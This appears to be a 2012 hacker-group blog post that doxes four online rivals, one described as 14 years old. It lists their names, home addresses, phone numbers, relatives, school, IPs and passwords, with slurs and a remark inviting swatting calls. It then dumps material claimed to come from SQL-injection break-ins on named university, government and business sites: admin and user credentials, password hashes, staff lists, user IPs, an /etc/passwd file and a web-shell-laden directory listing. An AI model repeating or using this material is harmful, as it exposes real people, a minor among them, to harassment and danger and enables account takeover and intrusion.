Saturday, August 4, 2012

HACK THE PLANET #1 #D0X #HACKED #ROOTED #LEAKS #DUMP


>> DoX's On:
Hex00010, ProtocoL/Manst0rm, s3rverexe [s0lar] & Snood The Skid.

>> User Leaks From:
bayardadtools.com, ctrides.com, glinx.com, mine.nu, insynq.com, mmauniverse.com, bergeret.org, leapgeeks.com, atriumcaterers.com, yayu.org, christianword.net, 2laugh.com & otca.info

>> Admin Passwords From:
icijapan.com, smallflyingarts.com, maplepark.com, marketing-idea.org, cycu.edu.tw, multimania.fr, colmich.edu.mx, ntlworld.com, tripod.com, fullnet.com, stonaldn.com, ices.edu.mx, mobipassword.com, nutn.edu.tw & com.edu

>> Full Leaks On:
anosy.gov.mg, nbanews.com, itshuetamo.edu.mx, stanford.edu, fursuiters.co.uk, monetperfumes.com, pamframing.com, cam-ceeds.org [null], & bulkemail.netsanchar.com





======================================================================================================
Hex00010's DoX
======================================================================================================
 


Reason for DoX: You're just a fucking faggot, bro. Lol.
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
Main Nickname: Hex00010
Main Email:uat666@hotmail.com
Real name: William Premore / William Palmer
Address:3393 Picken Store, RD Mason, TN 38049
Phone number: 901-294-3057

Mother: Lisa A Palmer
Father: Jeremy R Palmer

IP(s):67.142.163.22, 75.64.245.211, 94.75.217.248
Job(s): Federal Pussy
Xfire: demon771
-----------------------------------
Emails:
-----------------------------------
uat666@hotmail.com[Confirmed]
wpalmer114@email.itt-tech.edu[UNCONFIRMED]
wpalmer@dev-security.net[UNCONFIRMED]
williampalmer777@yahoo.com[UNCONFIRMED]
wpalmermscp@gmail.com[Confirmed]
forsaken_raiders@yahoo.com [Confirmed]
scyther777@live.com[Confirmed]
Scyther777@hotmail.com[Confirmed]
---------------------------------
-Twitter-
-----------------------------------
Hex's Twitter: https://twitter.com/Hex000101/
Real Twitter: https://twitter.com/williampremore
---------------------------------
Nicknames
-----------------------------------
Hex00010/
Hex000101
XXxxImmortalxxXX
scyther777
####################################################
#One of his email is " forsaken_raiders@yahoo.com "
#Which leads me to his alernates usernames,   
#XXxxImmortalxxXX and scyther777                   
#http://in-secure.forumn.org/t648-hackers-grounded 
#http://prntscr.com/csqxk   
#scyther777@live.com   
#####################################################
*******************************************
Picture&Link dump/proofs
*******************************************
http://prntscr.com/csqxk
XXxxImmortalxxXX = scyther777@live.com
XXxxImmortalxxXX = Forsaken_raiders@yahoo.com

http://tinychat.com/premore
FROM: https://twitter.com/williampremore/status/24530459123781632

http://prntscr.com/csryy -> Possible family member?
http://prntscr.com/cssmf -> XXxxImmortalxxXX -> scyther777@live.com
http://prntscr.com/cssuk -> x-DemoN77/demon771 -> Scyther777@hotmail.com

**VERY IMPORTANT!
Proof that Scythe777 = William Palmer = Hex00010:
http://prntscr.com/csteq

So technically:
XXxxImmortalxxXX = scyther777@live.com
scyther777 = William Palmer

Extra confirmation that Hex00010 = XXxxImmortalxxXX
http://prntscr.com/ctbig
--------------------------------------------
Hashes
--------------------------------------------


766ee790c52c18c10718d82e7bd830d4 : 397d
# ( http://prntscr.com/cssfg )
mysql> select passwd,0x3a,password_salt from smf_members where member_name LIKE '%hex0%' ;
 +------------------------------------------+------+---------------+
 | passwd                                   | 0x3a | password_salt |
 +------------------------------------------+------+---------------+
 | 76dafbfbbdd4ffc2f04605ac6930d0165d78dbff | :    | 397d          |
 +------------------------------------------+------+---------------+
 1 row in set (0.00 sec)

one of hex's password hashes from a forum he goes on ^
-------------------------------------------
IRC
-------------------------------------------
he also run's windows, probably 7.
Proof: [1:35:05 PM] ****: >Hex00010< CTCP VERSION
-Hex00010- VERSION mIRC v7.19 Khaled Mardam-Bey

mIRC for windows

======================================================================================================
Snoody, The Script Kiddy's DoX
======================================================================================================
 

-------------------------
****Basic Name****
First Name: Parker
Middle Name:
Last Name: Nelson
-------------------------
****Online ID's****
Alias: Snoods, Thornkajom (Used in 2008 with the name Parker Nelson)
-------------------------
****Contact Information****
Phone Number:(425)334-6745
Address: 110 - 140th AVE NE
Secondary Address:
Mailing Address:110 - 140th AVE NE
Emails: snoods.parker@gmail.com, godsnoods@gmail.com
Fax:
***Internet Commucation***
Skype: xboxmbsnoods
AIM: xbmbsnoods
Windows Live: snoods.parker@gmail.com
-------------------------
****People Close****
Mother: Tracey Eliziabeth Nelson
Father: Todd Nelson
Sister: Julie Nelson
Brother: TJ Nelson
-------------------------
****Social Media****
Facebook: https://www.facebook.com/parker.nelson.127
Formspring: http://www.formspring.me/sn000ds
Youtube: http://www.youtube.com/user/ThornKajom
Gravatar: http://en.gravatar.com/thornkajom - http://gyazo.com/f2db0b6b7acfd14072045d52af77dd04
Yahoo: Parkerthorns@yahoo.com
Gmail: snoods.parker@yahoo.com
Yahoo Answers: http://answers.yahoo.com/activity?show=ZPZNBcUGaa&link=starred
-------------------------
****Account Info****
Paypal: snoods.parker@gmail.com
-------------------------
****GamerTag's****
PSN: ?
XBOX: TTG Snoods
Nintendo: ?
-------------------------
****Websites****
http://screamsaver.wordpress.com/author/thornkajom/ (notice date - 2008)
------------------------
****Jacked Shit**** (jackedbitch1337)
Club Penguin: http://gyazo.com/d6309d4e5b8eed0e8877526e5c9b34af,http://gyazo.com/6820211d13c068d449b0a36f11d6d172
XboxMB: http://gyazo.com/d6309d4e5b8eed0e8877526e5c9b34af
------------------------
****Fun Shit****
Bigboy words mister: http://gyazo.com/8a8af4afb811c3552f0523b528bb85af
======================================================================================================
                                           Extra on Snood.
======================================================================================================
 

Domain ID:D38683596-LRMS
Domain Name:NAVYDEV.INFO
Created On:30-Jun-2011 22:33:42 UTC
Last Updated On:01-Jul-2012 22:28:51 UTC
Expiration Date:30-Jun-2013 22:33:42 UTC
Sponsoring Registrar:GoDaddy.com LLC (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:AUTORENEWPERIOD
Registrant ID:CR87156314
Registrant Name:Parker Nelson
Registrant Organization:
Registrant Street1:110-140th AVE NE
Registrant Street2:
Registrant Street3:
Registrant City:Lake stevens
Registrant State/Province:Washington
Registrant Postal Code:98258
Registrant Country:US
Registrant Phone:+1.4253346745
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:godsnoods@gmail.com
=============================================================================
after search with phone number look who shows up :)
----------------------------------------------------
http://www.directorycentral.com/business/wa/lake-stevens/tracy-elizabeth-nelson-15384913.html

http://www.bizfind.us/48/175531/tracy-elizabeth-nelson/lake-stevens.aspx

http://www.ewashingtonpages.com/business/tracy-elizabeth-nelson

Sister: http://www.facebook.com/julie.nelson.7927
Father:http://www.facebook.com/todd.nelson.39904
=============================================================================
steam data
-----------
[center] Steam Name (At Time Of Incident): ParkeR ProductionS
Steam ID: STEAM_0:0:42572596
Steam Profile Link: http://steamcommunity.com/profiles/76561198045410920/
Admin You Were Banned By:
Length Of The Ban (If Known): Perm
Would You Like Your Ban Shortened or Repealed? (Shortened/Repealed): Repealed
Reason Given For Ban: Don't know
Did You Commit The Actions Stated In The Ban Reason? (Yes/No):
Extenuating Circumstances (If Yes):
What Really Happened (If No): Was trolling, was being VERY sarcastic. Was saying things such as "I'm unbannable with over 9000 proxies and stolen credit cards" Admin banned me, don't know the reason why. I did not do anything wrong, but players who were on that didn't like me said I kill innocents EVERY time I play which is false. I did it once on accident and served my time for it.
Additional Details: Alm was there and even said

 I shouldn't have been banned. All I remember from who was there.
--End Copy--
===========================================================================
IP address:50.34.48.239 - http://bans.murdernetworks.com/index.php?p=banlist&hideinactive=false&searchText=STEAM_0:1:9320109

http://whatismyipaddress.com/ip/50.34.48.239 Matches up, same ISP as the one he uses for skype too:

50.34.247.223
-------------
http://www.geobytes.com/IpLocator.htm?GetLocation - seattle

50.34.48.239
------------
http://www.geobytes.com/IpLocator.htm?GetLocation - hmm another seattle?

50.34.49.126
------------
http://www.geobytes.com/IpLocator.htm?GetLocation
==========================================================================
Other Identity:
http://whois.polodomains.com/domain/rIFxGJxWDHHO9EJxai6_CQ.._info.html
 Hawk, Mike 
Email snoods.parker@gmail.com
    2475 coach house dr
    brookfield, wi 53045
    US
    +1.2627828255
===================================================================
Websites: snoodsgfx.net, navydev.info
===================================================================

Stress test on IP Address.
--------------------------
root@bt:~# ping 50.34.49.126
PING 50.34.49.126 (50.34.49.126) 56(84) bytes of data.
^C
--- 50.34.49.126 ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 40320ms

------------------------------------------------------------------------------------------------------
======================================================================================================
s3rver.exe's DoX
======================================================================================================
 

Reason For DoXing: You're a plain fucking loser, Hardeek. Buy your way into more teams, why don't ya?

---------------------------------------------------------
Name; Hardeek Sharma
Age; 23
Location; Mandurah Western Australia 6210
Phone number; (089) 586-1715 (proof it's real http://www.reverseaustralia.com/lookup/0895861715/)
---------------------------------------------------------
Aliases;
GrimTheGod
HugoTheGod
s3rver.exe
g-wiz 
doctor.exe
---------------------------------------------------------
Accounts on the interwebz (emails to);
}=emailz={
(hardeek.sharma2011@gmail.com)
(anon_ops@ymail.com)
(g-wiz@gmail.com)
(anon_ops@hotmail.co.uk
(s3rver@fbi.tf)
OtheR Accounts;
twitter.com/s3rverexe
twitter.com/s3rver_exe
http://www.youtube.com/user/StrikerPrototype
http://pastebin.com/u/s3rver
r00t1nj3ct(skype)
gangsta_rules1(other skype)
https://www.facebook.com/hardeek.sharma
https://twitter.com/#!/hardeekromantic
---------------------------------------------------------
Now for some embarssing shit;
http://i47.tinypic.com/34hb32o.png (how much do you have to pay for r00tw0rm mod?)

s3rverexe's old twitter @s3rver_exe got hacked by a ug hacker

>> Time for the swat phone calls

------------------------------------------------------------------------------------------------------
======================================================================================================
ProtocoL's DoX
======================================================================================================
 

Reason for DoXing: Launching that Wh0aMiRo0T shit to try & DoX myself {Bw0mp} & teammates.
>> How that ended: https://twitter.com/wh0amiro0t <<
TL;DR - You're a fucking loser. Dismissed.

-----------------------------------------------------------
Name: Phillip Quam
Age: 14
Address: 51306 Rush Lake Trail, Rush City, MN 55069, USA.
Home Phone: (320) 358-3051
Religion: Muslim
-----------------------------------------------------------
Twitters: @_ProtocoL & @Manst0rm
Emails: sexyprotocol@hotmail.com & protocal2@hotmail.com
Previous Passwords: iamsolegit & lolwut1337 & 3571h4x0r9312
-----------------------------------------------------------
FAMILY:
Mom: Linda M Quam
Age: 37
Dad: Michael Quam
Age: 41
Grandma: Ila Quam
Age: 65
Uncle: Maurice Quam
Age: 43
-----------------------------------------------------------
School: Rush City School District 139.
       (320) 358-4855.
       51001 Fairfield Ave
       Rush City, MN 55069
======================================================================================================
                                          End Of DoX's
======================================================================================================
>> At the end of the day, whoever was DoX'd is just a script kiddy, loser, or all around worthless
>> waste of space. So feel no remorse, they were asking for it. :P
======================================================================================================
Now For The Web-Hacking...
======================================================================================================
 

> - - - - - - - - - - - - - - - - - - - - STANFORD.EDU - - - - - - - - - - - - - - - - - - - - - - - <

STANFORD.EDU

Active DB: d_CTL_tomprof
Columns: 6
Tables: 1
MySQL Version: 5.1.63-0+

Table: Users
Columns: users.ID. username. password.
Login Found: hejtcvaj@gmail.com:ed0232cb29e2b34349332a51e4a8335e

> - - - - - - - - - - - - - - - - - - - -   COM.EDU    - - - - - - - - - - - - - - - - - - - - - - - <
TARGET: www.com.edu
Current DB: newsdesk << nothing useful.
DB primarily used: MySQL
DB Admin: admin:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
TL;DR - A lot of shit, but not many passwords. Just a short sample of what was found "other shit" wise.
-------------------------------------------------------------------
Admin Credentials from MySQL database, Users table, User/Password columns.

admin:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
admin2:*6AB0A3122043A3771BD61D69EA15E3697CBFBE23
phptest:*C260A4F79FA905AF65142FFE0B9A14FE0E1519CC
root:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
web:*CD487D8169ACF6CEACA7F089C52B960B97E91C1B
web2:*435D03C6084F192B292E79A5F06B6A7B48572B83
wordpress:*6AB0A3122043A3771BD61D69EA15E3697CBFBE23
-------------------------------------------------------------------
Some Employees + their Emails/Extensions [Only A-B, because there were TOO many]

Alan Bigos - abigos@com.edu - 8327 - SCI-115
Alesha Vardeman Aulds - aaulds@com.edu - 8432 - LMCR
Ali Ravandi - aravandi@com.edu - 8225 - SCI-107
Alice Watford - awatford@com.edu - 8300 - LRC-219
Alice Whistler - awhistler@com.edu - 8646 - CLC
Amanda Bezemek - abezemek@com.edu - 8360 - FAB-104
Amanda Garza - agarza@com.edu - 8308 - ADM-141
Barry Penland - bpenland@com.edu - 8403 - ADM-125B
Bernie Smiley - bsmiley@com.edu - 8356 - LRC-236
Beth Hammett - bhammett@com.edu - 8389 - LRC-264
Betty Verrett - bverrett@com.edu - 8611 - TVB-1660
Bill Raley - braley@com.edu - 8283 - TVB-1502
BJ Whitburn - bjwhitburn@com.edu - 8299 - PSC-108
Blanca Comeaux - bcomeaux@com.edu - 8212 - LRC-Suite A
Bonnie Harrill - bharrill@com.edu - 8365 - GCSI-105
Bonnie Mitchell - blmitchell@com.edu - 8605 - TVB-1624
Bonnie Myers - bmyers@com.edu - 8226 - Delmar - Senior Center
Brad Traylor - btraylor@com.edu - 8531 - TVB-1572
Brett Stephens - bstephens@com.edu - 8206 - L-122
-------------------------------------------------------------------
> - - - - - - - - - - - - - - - - - - - ITSHUETAMO.EDU  - - - - - - - - - - - - - - - - - - - - - -  <
TARGET: www.itshuetamo.edu.mx
Current DB: internetworks-s10219_generaltec
Not too much vital shit, only one account on the site..
Potential Admin: ivanbeltran_ortiz@hotmail.com:21101986$$
-------------------------------------------------------------------------------------
TABLES/COLUMNS ;

TABLE:actividades     
COLUMNS: clave, inicio, fin, descripcion

TABLE: archivos
COLUMNS: clave, nombre, titulo

TABLE:noticia 
COLUMNS: clave, fecha, titulo, descripcion, archivo, imagen

TABLE: paginas
COLUMNS: id_pagina, titulo, categoria, archivo, fechapublica, descripcion, imagen

TABLE: usuarios
COLUMNS: usuario, password << used to get: ivanbeltran_ortiz@hotmail.com:21101986$$
> - - - - - - - - - - - - - - - - - - - - ANOSY.GOV.MG - - - - - - - - - - - - - - - - - - - - - - - <

####################
### ANOSY.GOV.MG ###
####################

SQLi + Way too many tables/columns to list, so I'll just drop the admin info/email.

User: admin
Email: davida@anre.gov.mg
Pass: 6db1d285221baec58a201ae58b378765:ATekKqGVm8uVKNbW

User: anosy
Email: anosy@anosy.gov.mg
Pass: 087d1bfc0006458bfe42791f516d548e:u1qRRCDWVEm699BD

> - - - - - - - - - - - - - - - - - - - -  NBANEWS.US HACK - - - - - - - - - - - - - - - - - - - - - <

###################
### NBANEWS.COM ###
###################

Admin User: admin
Admin Pass: q]z/q]z/

TABLE: admin
COLUMNS: id. name. username. password. links. config. ads. admins. email. notes.

TABLE:ads
COLUMNS: nowdate. id. name. code. clicks. date. type. admin_id. template.

TABLE: config
COLUMNS: id. sitename. siteurl. sitetitle. time. email. toplinks. template. keywords. upload. vistis. sitestate. sitestatemsg. redirect_host. redirect_redirector.

TABLE: links
COLUMNS: id. url. name. size. author. admin_id. downloads. date.

TABLE: linkso
COLUMNS: id. url. name. size. author. admin_id. downloads. date.

TABLE: online
COLUMNS: ip. time.

TABLE: redirect_host
COLUMNS: id. host.

> - - - - - - - - - - - - - - - - - - - - - PAMFRAMING ROOT - - - - - - - - - - - - - - - - - - - - <
Target: www.pamframing.com

drwxr-xr-x  4 pamframing    4096 Apr 22 15:48 .
drwxr-xr-x 10 pamframing    4096 Apr 22 15:49 ..
-rw-r--r--  1 pamframing    2694 Apr 22 15:42 1.jpg
-rw-r--r--  1 pamframing   47975 Apr 22 15:42 2X-V3.jpg
-rw-r--r--  1 pamframing    2660 Apr 22 15:42 2X-V3.php.gif
-rw-r--r--  1 pamframing   19687 Apr 22 15:43 300pl.jpg
-rw-r--r--  1 pamframing    7178 Apr 22 15:42 30mp.jpg
-rw-r--r--  1 pamframing   31993 Apr 22 15:42 3m_breatheasy_be_10_papr_bu.gif
-rw-r--r--  1 pamframing   14975 Apr 22 15:42 3pse.jpg
-rw-r--r--  1 pamframing     920 Apr 22 15:43 529bypass.php
-rw-r--r--  1 pamframing   25123 Apr 22 15:42 5p.jpg
-rw-r--r--  1 pamframing   18148 Apr 22 15:42 5p2.jpg
-rw-r--r--  1 pamframing   41499 Apr 22 15:44 Bullardjpg.jpg
-rw-r--r--  1 pamframing   82707 Apr 22 15:45 Decontamination-Kit.jpg
-rw-r--r--  1 pamframing   26605 Apr 22 15:45 F16036~wn.jpg
-rw-r--r--  1 pamframing   37555 Apr 22 15:46 First\ Aid\ Kit.jpg
-rw-r--r--  1 pamframing    1293 Apr 22 15:46 GIrsl.gif
-rw-r--r--  1 pamframing   18291 Apr 22 15:46 GasMask.jpg
-rw-r--r--  1 pamframing   42609 Apr 22 15:47 Homesub1.gif
-rw-r--r--  1 pamframing   40556 Apr 22 15:47 McroTrk_SlimTrak_GPS.jpg
-rw-r--r--  1 pamframing   37555 Apr 22 15:48 NthSfty_019743-0030L_25\ Person_First\ Aid\ Kit.jpg
-rw-r--r--  1 pamframing   37735 Apr 22 15:48 Pg106_2.jpg
-rw-r--r--  1 pamframing    3348 Apr 22 15:48 SST-MA1964-30-449_L.jpg
-rw-r--r--  1 pamframing    3177 Apr 22 15:48 S_PNP2060.jpg
-rw-r--r--  1 pamframing   94939 Apr 22 15:48 Style.php
-rw-r--r--  1 pamframing    8372 Apr 22 15:48 Trasub1.jpg
-rw-r--r--  1 pamframing  152770 Apr 22 15:48 Underpiner\ IM-5P.jpg
-rw-r--r--  1 pamframing   17610 Apr 22 15:48 Video.jpg
-rw-r--r--  1 pamframing  105542 Apr 22 15:48 Winter.jpg
-rw-r--r--  1 pamframing   47975 Apr 22 15:48 X-V3.php.gif
-rw-r--r--  1 pamframing  209120 Apr 22 15:48 Xgroupvn.php
drwxr-xr-x  2 pamframing    4096 Apr 22 15:42 _notes
-rw-r--r--  1 pamframing   13761 Apr 22 15:43 access.jpg
-rw-r--r--  1 pamframing    3478 Apr 22 15:43 add_to_cart.jpg
-rw-r--r--  1 pamframing   57636 Apr 22 15:43 aut2000.jpg
-rw-r--r--  1 pamframing   10682 Apr 22 15:43 barbie.jpg
-rw-r--r--  1 pamframing   53242 Apr 22 15:43 basket.jpg
-rw-r--r--  1 pamframing  110188 Apr 22 15:43 bbb.php
-rw-r--r--  1 pamframing    1721 Apr 22 15:43 blue_guns.gif
-rw-r--r--  1 pamframing   23667 Apr 22 15:44 books.gif
-rw-r--r--  1 pamframing    8185 Apr 22 15:44 buckle.jpg
-rw-r--r--  1 pamframing   43702 Apr 22 15:44 bunlam1.php
-rw-r--r--  1 pamframing   50184 Apr 22 15:44 c16.jpg
-rw-r--r--  1 pamframing    3780 Apr 22 15:44 car7.jpg
-rw-r--r--  1 pamframing    2948 Apr 22 15:44 car9.jpg
-rw-r--r--  1 pamframing   30679 Apr 22 15:44 ce.jpg
-rw-r--r--  1 pamframing    4874 Apr 22 15:44 change_password_ov.jpg
-rw-r--r--  1 pamframing    5979 Apr 22 15:44 clothing_category.JPG
-rw-r--r--  1 pamframing   33781 Apr 22 15:45 coat.jpg
-rw-r--r--  1 pamframing    7192 Apr 22 15:45 coming-soon.jpg
-rw-r--r--  1 pamframing    5282 Apr 22 15:45 conspace_voice_amplifier.gif
-rw-r--r--  1 pamframing    2406 Apr 22 15:45 contact_us.jpg
-rw-r--r--  1 pamframing    7827 Apr 22 15:45 corrugated.jpg
-rw-r--r--  1 pamframing    7475 Apr 22 15:45 cuibap.php.gif
-rw-r--r--  1 pamframing   38900 Apr 22 15:45 dimension.gif
-rw-r--r--  1 pamframing   34650 Apr 22 15:45 drinking_baby.bmp
-rw-r--r--  1 pamframing    5249 Apr 22 15:45 equipment.gif
-rw-r--r--  1 pamframing    7697 Apr 22 15:46 fao_502-h.jpg
-rw-r--r--  1 pamframing    5625 Apr 22 15:46 fast.jpg
-rw-r--r--  1 pamframing   39980 Apr 22 15:46 fieldbook.gif
-rw-r--r--  1 pamframing   28254 Apr 22 15:46 first.jpg
-rw-r--r--  1 pamframing    4887 Apr 22 15:46 game_played.jpg
-rw-r--r--  1 pamframing    3864 Apr 22 15:46 hatch_PC290.jpg
-rw-r--r--  1 pamframing   22061 Apr 22 15:46 head04.jpg
-rw-r--r--  1 pamframing   51204 Apr 22 15:46 head3.jpg
-rw-r--r--  1 pamframing   55229 Apr 22 15:46 header.php
-rw-r--r--  1 pamframing   17981 Apr 22 15:47 hlmt.gif
-rw-r--r--  1 pamframing   16066 Apr 22 15:47 homelandproduc1.gif
-rw-r--r--  1 pamframing   37864 Apr 22 15:47 homelandproduc3.gif
-rw-r--r--  1 pamframing   18291 Apr 22 15:47 homelandproduct2.jpg
-rw-r--r--  1 pamframing   18291 Apr 22 15:47 homelandsecurity.jpg
-rw-r--r--  1 pamframing   25458 Apr 22 15:47 homesub2.gif
-rw-r--r--  1 pamframing    9980 Apr 22 15:47 hyflex.jpg
-rw-r--r--  1 pamframing    6322 Apr 22 15:47 im2se.jpg
-rw-r--r--  1 pamframing   16112 Apr 22 15:47 im3.jpg
-rw-r--r--  1 pamframing    8934 Apr 22 15:47 im350-2.jpg
-rw-r--r--  1 pamframing   34672 Apr 22 15:47 im350.jpg
-rw-r--r--  1 pamframing   16875 Apr 22 15:47 im3501_1.jpg
-rw-r--r--  1 pamframing    8413 Apr 22 15:47 im4p.jpg
-rw-r--r--  1 pamframing   24810 Apr 22 15:47 image008.jpg
-rw-r--r--  1 pamframing   85664 Apr 22 15:47 image009.jpg
-rw-r--r--  1 pamframing   41846 Apr 22 15:47 interface.jpg
-rw-r--r--  1 pamframing   27386 Apr 22 15:47 manual.jpg
-rw-r--r--  1 pamframing   51468 Apr 22 15:47 maxi.jpg
-rw-r--r--  1 pamframing    9388 Apr 22 15:47 md_apr_optifit.jpg
-rw-r--r--  1 pamframing   28424 Apr 22 15:47 military\ product.jpg
-rw-r--r--  1 pamframing   11847 Apr 22 15:47 mitlsub1.gif
-rw-r--r--  1 pamframing   33781 Apr 22 15:47 mitproduct2.jpg
-rw-r--r--  1 pamframing   14092 Apr 22 15:47 mitproduct3.jpg
-rw-r--r--  1 pamframing    3532 Apr 22 15:47 more1.jpg
-rw-r--r--  1 pamframing    6598 Apr 22 15:47 msub2.jpg
-rw-r--r--  1 pamframing 1594644 Apr 22 15:48 nature_wallpapers-001_copy.jpg
-rw-r--r--  1 pamframing    2655 Apr 22 15:48 no_image_small.jpg
-rw-r--r--  1 pamframing    3477 Apr 22 15:48 pg105_1.jpg
-rw-r--r--  1 pamframing    8751 Apr 22 15:48 polarion_hid_searchlight_PF40.bmp
-rw-r--r--  1 pamframing   84318 Apr 22 15:48 prisma_ce.jpg
drwxr-xr-x  2 pamframing    4096 Apr 22 15:48 resized
-rw-r--r--  1 pamframing   62157 Apr 22 15:48 s30_dekor.jpg
-rw-r--r--  1 pamframing   14092 Apr 22 15:48 safetyeye.jpg
-rw-r--r--  1 pamframing    4927 Apr 22 15:48 search.jpg
-rw-r--r--  1 pamframing   14325 Apr 22 15:48 sec4ever.php
-rw-r--r--  1 pamframing    9282 Apr 22 15:48 sigma2000.jpg
-rw-r--r--  1 pamframing   18478 Apr 22 15:48 smart.jpg
-rw-r--r--  1 pamframing      43 Apr 22 15:48 spacer.gif
-rw-r--r--  1 pamframing    5966 Apr 22 15:48 st_fire_trax_fpv_ring.gif
-rw-r--r--  1 pamframing   17610 Apr 22 15:48 trainingp1.jpg
-rw-r--r--  1 pamframing    3993 Apr 22 15:48 trainingp2.jpg
-rw-r--r--  1 pamframing   13395 Apr 22 15:48 trainingp3.jpg
-rw-r--r--  1 pamframing   37398 Apr 22 15:48 triosyn_resp_t3000_t3100.gif
-rw-r--r--  1 pamframing   37864 Apr 22 15:48 triosyn_resp_t5000.gif
-rw-r--r--  1 pamframing    4963 Apr 22 15:48 trsub2.jpg
-rw-r--r--  1 pamframing    5194 Apr 22 15:48 update_profile.jpg
-rw-r--r--  1 pamframing  209106 Apr 22 15:48 xprobi.php

> - - - - - - - - - - - - - - - - - - - - - NETSANCHAR ROOT - - - - - - - - - - - - - - - - - - - - <
Targ: [http://bulkemail.netsanchar.com]

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
> - - - - - - - - - - - - - - - - - - - - - ICES.EDU.MX ~ ~  - - - - - - - - - - - - - - - - - - - - <
TARGET: www.ices.edu.mx
METHOD: SQLi
Current DB: website [Not bothering to list tables/columns.. too many.]
Admin Info: admin:$P$B6ey50HP9fCU/3DJSYn5hLdDPxfCVs1
webmaster:webones
Admin Email: d8a_mx@hotmail.com
---------------------------------------------------------
USER LOGINS:

carreras:6b7efc47e7c76c3912203106eca72c56
preparatoria:6b7efc47e7c76c3912203106eca72c56
webmaster:0141f0f0597d8d7ff13b0b5571f7d124 [webones]
> - - - - - - - - - - - - - - - - - - - - - OTCA.INFO USERS - - - - - - - - - - - - - - - - - - - - <
Target: OTCA.INFO
Method: SQL Injection
Admin Info: administrador:wmm123
Admin E-Mails: imprensa@otca.org.br, lucas@brclick.com.br, sandra@otca.org.br

>> I will not be posting all tables/columns/users in this, because there are FAR too many to do.
>> So, I've shortened it accordingly to the user accounts retrieved from the injection.

administrador:1a0bb06800953e9007d3b993ca8f4884
Carlos.Salinas:113d6e3225a746569635e5ef89f1a271
Jannette.Aguirre:6bc451e791026cb3f0eb0e06603e11f0     
Isabel.Lapena:202cb962ac59075b964b07152d234b70
Tobias.Leyva:edb684859b848362ec56904286947614 
Luz.Mantilla:202cb962ac59075b964b07152d234b70 
Brent.Millikan:656acfadeda5af45c881b8a91980514f
Victor.Miyakawa:202cb962ac59075b964b07152d234b70
Fernando.Alcantara:e2fc714c4727ee9395f324cd2e7f331f           
Uriel.Murcia:202cb962ac59075b964b07152d234b70 
Nestor.Ortiz:693f4ed7c1c1038c08eedbf3fa99b9d8 
Ana.Pacheco:202cb962ac59075b964b07152d234b70
Jenner.Tavares:e2fc714c4727ee9395f324cd2e7f331f       
Adriano.Sarmiento:1821db03c3e857162b34d56b4f028334    
Sandra.Sguerra:2925a2783ea296623a229c5c3abd5671
Marisela.Torres:202cb962ac59075b964b07152d234b70              
Fred.Chu:e2fc714c4727ee9395f324cd2e7f331f     
Marle.Villacorta:e2fc714c4727ee9395f324cd2e7f331f     
Edgar.Benitez:e2fc714c4727ee9395f324cd2e7f331f
Eduardo.Villegas:202cb962ac59075b964b07152d234b70
Javier.Delaguila:e2fc714c4727ee9395f324cd2e7f331f     
Enrique.Rios:e2fc714c4727ee9395f324cd2e7f331f

> - - - - - - - - - - - - - - - - - - - - - YAYU.ORG DUMP~ - - - - - - - - - - - - - - - - - - - - - <
TARGET: www.yayu.org
Admin Info: 7a57a5a743894a0e:7a57a5a743894a0e
Login Page: http://bbs.yayu.org/login.php
--------------------------------------------------------------
USER IP'S [Incomplete: Too Many To Post]
217.64.115.160
200.104.169.209
217.64.115.160
41.140.22.120
83.80.134.156
189.242.239.186
83.80.134.156
188.41.81.210
80.77.91.221
175.138.34.90
41.143.11.65
41.137.74.192
41.107.173.65
175.141.194.74
41.137.57.199
120.59.68.88
196.217.238.48
59.177.139.17
203.87.176.19
88.241.61.247
203.87.176.19
66.30.140.35
94.208.33.118
94.208.33.118
218.19.204.254
218.19.204.254
217.114.211.245
93.89.216.26
93.89.216.26
93.89.216.26
220.171.155.23
--------------------------------------------------------------
USERS DUMP [incomplete, too many to post]

110160:e10adc3949ba59abbe56e057f20f883e
12312312:96e79218965eb72c92a549dd5a330112
348375641:6fd624d7466a6678d5e08dd14464a986
abanachange:f35364bc808b079853de5a1e343e7159
agcvtzkprh:92d7dcc35d60c50b00b85f2c3b20a228
agehlertfern:f35364bc808b079853de5a1e343e7159
